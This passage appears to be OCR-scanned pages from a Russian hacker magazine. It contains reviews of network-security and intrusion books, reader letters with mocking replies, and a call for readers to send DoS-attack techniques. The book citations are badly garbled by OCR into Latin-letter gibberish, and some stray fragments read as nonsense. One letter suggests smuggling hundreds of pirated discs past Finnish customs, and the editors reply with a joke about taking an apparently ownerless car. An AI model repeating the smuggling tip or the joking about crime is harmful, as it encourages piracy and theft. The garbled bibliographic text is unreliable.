используемые в сетях TCP/IP, 
что они собой представляют 
и как все это работает). 
Освоишь базовые основы 
операционной системы Unix 
(разберешься с демонами, 
запуском программ в 
фоновом режиме, поймешь, 
что такое язык перл, и 
узнаешь, как запустить 
программу для юникс из-под 
виндов). Ну и напоследок 
удивишься тому, из чего 
выросла WindowsNT. 

Во второй книге ты вникнешь в корни хакерской 
культуры (откуда все это пошло), познакомишься с 
криптосистемами и программной защитой своих 
продуктов от дизассемблирования и отладки. 
Информацию автор излагает прямо и без всяких там 
научных терминов (хотя в главе про криптографию тебя 
прогрузят математическими формулами и 
определениями), и понять, о чем говорится в целом, 
труда не составит. Общее впечатление немного омрачает 
отсутствие листинга примеров из книги, но при желании 
тебе их без труда вышлют на мыло (проверено - это 
работает!). 

Книга будет интересна тебе в любом случае, ведь это не 
руководство по взлому, а информация об общих 
принципах и методах с примерами программ. 


еси bose 
mov az [6+0 
еси hz 16+ 06] 


Редакция выражает благодарность магазину 
“Библио-Глобус” за предоставленные книги. 


CTUBEH HOPTHATT, DitYDU HOBAH. 
OBHAPYICEHUE BTOPICEHUU В СЕТЬ 
(НАСТОПЬНАЯ ННУГА СПЕЦОАПОСТА ПО 
HPUNTOAHAnUSY). — М. MOPU, 2001 — 384 с. 


А вот это реально полезная и 
сложная книга, освоив 
которую, ты станешь 
разбираться в протоколах, 
пакетах с данными и сетевых 
атаках. Тут подробнейшим 
образом расписано, какими 
методами защитить свою сеть 
и распознать начало атаки, 
«повысить безопасность 
системы, создать ловушки и 
фильтры, отличить 
нормальный от аномального 
трафика». Все изложение 
построено на реальных 
примерах, начиная от атаки Митника и заканчивая 
анализом запросов и ответов при сканировании твоего 
хоста. Да что говорить, ведь авторами книги являются 
«первый начальник группы обнаружения вторжения 
Министерства обороны США» и «старший аналитик 
безопасности в лаборатории прикладной физики...», 
поэтому на компетентность авторов можно надеяться. 
Несмотря на серьезность, огорчило полное отсутствие 
содержания в книге, наверное, для большей 
секретности; ну и ладно, все равно читать книгу из 
середины не получится, ведь информация располагается 
последовательно, и для понимания главы из середины 
придется изучить все предыдущие. 

Эта книга из раздела must read, если ты решил серьезно 
заняться сетевой безопасностью, другим же она будет 
интересна в познавательных целях. 


РЕБ арелу ее 


иторамений а сеть 


CTUBEH HOPTHAT, MAPH Hvnep, Тэтт 
PUPHOY, НАРЕН PPEDEPUH. AHANUS 
TUNOBbIH HAPYWEHUU BESOMNACHOCTU В 
СЕТЯН. — М.: BUnbamc, 200) — 460 с. 


Просто бесценная книга! 
Отличается от всех остальных 
тем, что тут выложен просто 
самый настоящие experience! 
Чистый опыт, полученный 
авторами в боях, грамотно 
переплетается с небольшими 
теоретическими вставками. В 
книжке подробно разобрано 
несколько сот взломов, 
причем их анализ проводится 
на уровне пакетов. Целая 
глава посвящена 0о5-атакам. 
Короче говоря, самый 
большой must read 
сегодняшнего обзора. Только учти, что не все тебе будет 
понятно, если ты совсем не разбираешься в протоколах, 
осях и кодинге. 

Этот бук будет полезен тебе, если ты уже начитался 
теории и теперь хочешь познакомиться непосредственно 
с практикой, но, не кидаясь, сломя голову, взламывать 
что попало, рискуя загреметь при этом на десяток лет, а 
безопасно полистывая книжку на своем мягком 
диванчике. 


Анаит PORDAS 
нарушений 
безопасности 
в сетях 


Тансумт MEBUH. 

ТЕТОБЫ HAHEPCHUH АТАН — М.: 
«ПознаВАТЕПЬНАЯ HHUrFA Ппюс», 2001 — 
ee4 c. 


BuBNnUA НАНЕРА — f™l.: MAUOP OCUNEHHO 
A.U., 200е — Siec. 


Как обычно, не обходится 
без плохих книг. 
Информация этого 
представителя книгус- 
макулатурус была собрана с 
разных сайтов Интернета, 
такое чувство, что автор 
просто взял и магической 
комбинацией клавиш 
Ctrl+C/Ctrl+V собрал 
материалы воедино, причем 
иногда даже проскакивают и 
собственные мысли 
«писателя». Большинство 
материалов просто «слизано» 
с оригинала, пострадал даже 
твой любимый ][ - несколько 
глав были ПОЛНОСТЬЮ (мне 
даже не влом было 
проверить) скопированы из 
журнала безо всяких 
изменений, хоть ссылка в 
списке использованной 
литературы оставлена, и на 
том спасибо. Очень не 
понравилась позиция автора 
по отношению к читателю - 


возникает такое чувство, что 
на тебя смотрят «с высока», 
так, будто автор - 


компьютерный маг и может сделать с твоим компом по 
сети абсолютно все. К тому же информация, 
представленная в книге, «слегка» устаревшая: ну у кого, 
скажите, дома стоит NT4SP3? Все уже давно перешли Ha 
более новые операционки (а воти не согласен! книжка 
отстойная, с этим никто не спорит, но серваков под NT4 
в сети еще предостаточно, многие даже без 
сервиспаков... - прим. ред.). Ну и последняя капля 
дегтя в бочку смолы - куча багов, присутствующих 
повсеместно; как тебе слова «инжиниринг» или «gete- 
way»? 

Рекомендуется тем, кто хочет узнать, как взламывали 
устаревшие системы и кого не особо парит присутствие 
ошибок и откровенное копирование материала. 
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ПИСЬМА 


From: “Давыденко Лена” (4ау-1епа@уапаех . ги) 
То: spec@real.xakep.ru 
Subj: Мое мнение. 


Доброго время суток. 

Посмотрела я вашу рубрику “письма” и увиде- 
ла, что пишет преимущественно мужская поло- 
вина. Я далеко не хакер и даже ламером не 
могу себя величать. Выписываю ваш журнал. 
Естественно, не все мне так понятно, как 
большинству читателей, но полезную информа- 
цию все же для себя нахожу. А пишу я, соб- 
ствено, вот по какому поводу. Последний 
спец-выпуск очень даже ничего. В каждой ста- 
тье много интересной инфы. Хотелось бы отме- 
тить статьи про общение в инете, про про- 
ституцию... Нет, интересно было все. И про 
симов голая правда. Эту тему можно было бы 
раскрутить побольше. Там приколов хватает. 
Про киберсекс тоже здорово. А рассказ мне 
первый понравился. Данины сказки больше ве- 
селят, а эти жизни учат. Спасибо вам боль- 
шое. Продолжайте плодотворно работать. А мы 
будем писать. 


From: spec@real.xakep.ru 
To: “Давыденко Лена” (dav-lena@yandex.ru) 
Subj: RE: Мое мнение. 


Привет, Леночка! 

Ты даже представить себе не можешь, как приятно получить письмо 
от девушки, когда “пишет преимущественно мужская половина” :(. За 
комплементы по поводу СуБе!-Спеца — спасибо! Мы так и знали, что 
статьи про киберсекс и киберпроституток понравятся перцам и пель- 
мешкам, читающим Спец ;). Не секрет, что заниматься сексом хочется 
постоянно, а раз уж мы живем в онлайне... вот, собственно, кхм... :). 
А по поводу, что “далеко не хакер и даже не ламер” - не переживай! 
Просто читай Спец, особенно номера по взлому. 

Ждем новых писем! 


From: nikita@studentu.ru 
To: spec@real.xakep.ru 
Subj: hi 


Привет, Хакерспец! Хорошо, у вас рубрика e- 
мыл появилась! 

Типа, у меня история случилась, хочу поде- 
литься. Ну и подкинуть несколько идей для 
варезников, т.е. для мелких, которые просто 
хотят немного заработать 

на нашем 2х-долларовом ПО. Вообщем, собрался 
я в ехать в ******. Решил выбрать дешевый 
путь.... через Хельсенки и Стокгольм. Забро- 
нировал в турфирме паром из фин. в швецию, 
купил билет на автобус из Питера, заказал 
через инет (!) билетик на самолет до лондо- 
на (~206aKcoB), и лег спокойно спать... Ко- 
роче, не о том речь... Кстати, не думайте, 
что я на авось все так устроил... мои зна- 
комые сто раз таким макаром ездили... Да, 
выехал я в 7утра с отчимом (да, именно с 
ним, матуха заболела и сеструха тоже...) 
Вот доехали мы до Выборга... кстати, краси- 
вый город... тихий, но богатый и компьютер- 
ный (! - 8 магазинов ПО и ПК) НАконец-то 
добрались до Passikuskus (по-моему именно 
так называется Паспортный контроль по-фин- 
ски), ну и отправили меня обратно, за 
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неимением у отчима доверенности на меня (мне 
16). Ладно бы на автобусе, деньги были - 40 
евро отчим отстегнул на обратный переезд. 


Там такой пахан сидел - ничего, поговори- 
ли... рассказал мне о своем бизнесе, о курь- 
езах на границе с финами, посочувствовал, и 
денег не взял! Вообщем я пишу, чтобы ска- 
зать, что когда я торчал на таможне (3 часа) 
- ни разу ни машины, ни автобусы не проверя- 
ли на багаж! Так что можно провести хоть 500 
дисков - никто не заметит. А если через ась- 
ку найти кого-нить из фин-ии Русскоязычных - 
можно бизнес с ними сделать. Это круто. 
Только мое имя никому не скажу... чтоб про- 
блем не было.... И куда я ехал - вы тоже не 


узнаете - из Швеции можно и в Париж и в Лон- 
дон и куда хочешь за 20$ ехать! 


From: spec@real.xakep.ru 
To: nikita@studentu.ru 
Subj: RE: hi 


Дарова, Никита! Вот делишься ты сейчас с нами своей историей, и да- 
же не подозреваешь, как у нас бывает. Вот вчера пошли мы из редак- 
ции за водкой и презервативами, потому, что рабочий процесс же на- 
до поддерживать, сам понимаешь. Смотрим - стоит на улице у редак- 
ции 600-й мерседес. С виду - точно ничей, сто процентов! Ну, мы и 
думаем: нам все равно до палаток идти метров семьсот, так что лучше 
поехать на машине - а то чего добру-то пропадать на улице, она же 
стоя без движения заржаветь может! В общем, обходим мы по-хозяй- 
ственному тонированный агрегат, беремся за ручку, открываем дверь, 
а там - Хоп! - и мужик сидит. Зыркает Ha нас так, и спрашивает: вам, 
мол, чего надо, граждане? Ну, мы и говорим, так мол, ничего, мы в па- 
латки идем за расходными материалами. Извинились, в общем, и уш- 
ли. 

А свиду - точно ничья была машина! 

Вот такая фигня. Приезжай к нам - у нас в городе полно ничьих ма- 
шин, выберешь себе по вкусу. 

Твои даздрапермы. 


From: Уродец (svetlic@xakep. ги) 
То: spec@real.xakep.ru 
Subj: 


Товарищт , хацкеры у меня наибольшая пробле- 
ma!!! 

Мой Новый лицензионный ХР не хочет выклю- 
чаться вообще!не знаю, что делать!!На кнопки 
вообще не реагирут ‚просто появляется обыя- 
ный рабочий стол и все! Пробовал все и даже 
систему восстанавливал по числам-нихрена! 
Поэтому и решил написать вам -поможите чем 
нибудь. Заранее спасибо! 


From: spec@real.xakep.ru 
To: Уродец (svetlic@xakep.ru) 
Subj: RE: 


Все в порядке приятель! По нашим сведениям к лицензионному XP 
прилагается принципиально новая система защиты от незаконного 
копирования. Имеется в виду, что если пользователь не сможет на- 
жимать на какие-либо кнопки, то и систему спиратить ему не удаст- 
ся. Из доступных функций действительно обнаружена только одна 
— восстановление системы по числам. В M$ решили, что лишать 
пользователей такого удовольствия было бы совсем уж жестоко, по- 
этому одну функцию оставили. Ну и еще одна функция, без которой 
не обходится ни один win - Restart. Так что, Ублюдок, не парься и не 
волнуйся - ты являешься счастливым обладателем лицензионной ХР 
— все хорошо. 
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ИЗ-ЗА BAC 
ПРОИГРЫВАЕМ! 


Я МОГУ ПОДЕЛАТЬ, 
ЕСЛИ ЭТОТ ЛУНАТИК 
МНЕ "СКОРОСОН" В ВОДУ 
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ЖИЗНИ ТАК 
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_ ВАС ЗДЕСЬ. 


Что надо сделать? 


Прислать на spec@real.xakep.ru эксклюзивную 
инфу по теме номера (взлом —> Оо5-атаки): 
методы взлома, тулзы, фишки и хитрости, о 


которых мы сами не написали в журнале. 


В каком виде? 
В виде статьи (как в журнале). Пиши, как читаешь 


— не морочься. 


Что будет? 
Будет куча поощрительных призов и главный приз 


— лучшую статью мы опубликуем в журнале!!! 


Пригпашаем К сотрудничеству авторов 


noah@real.xakep.ru 
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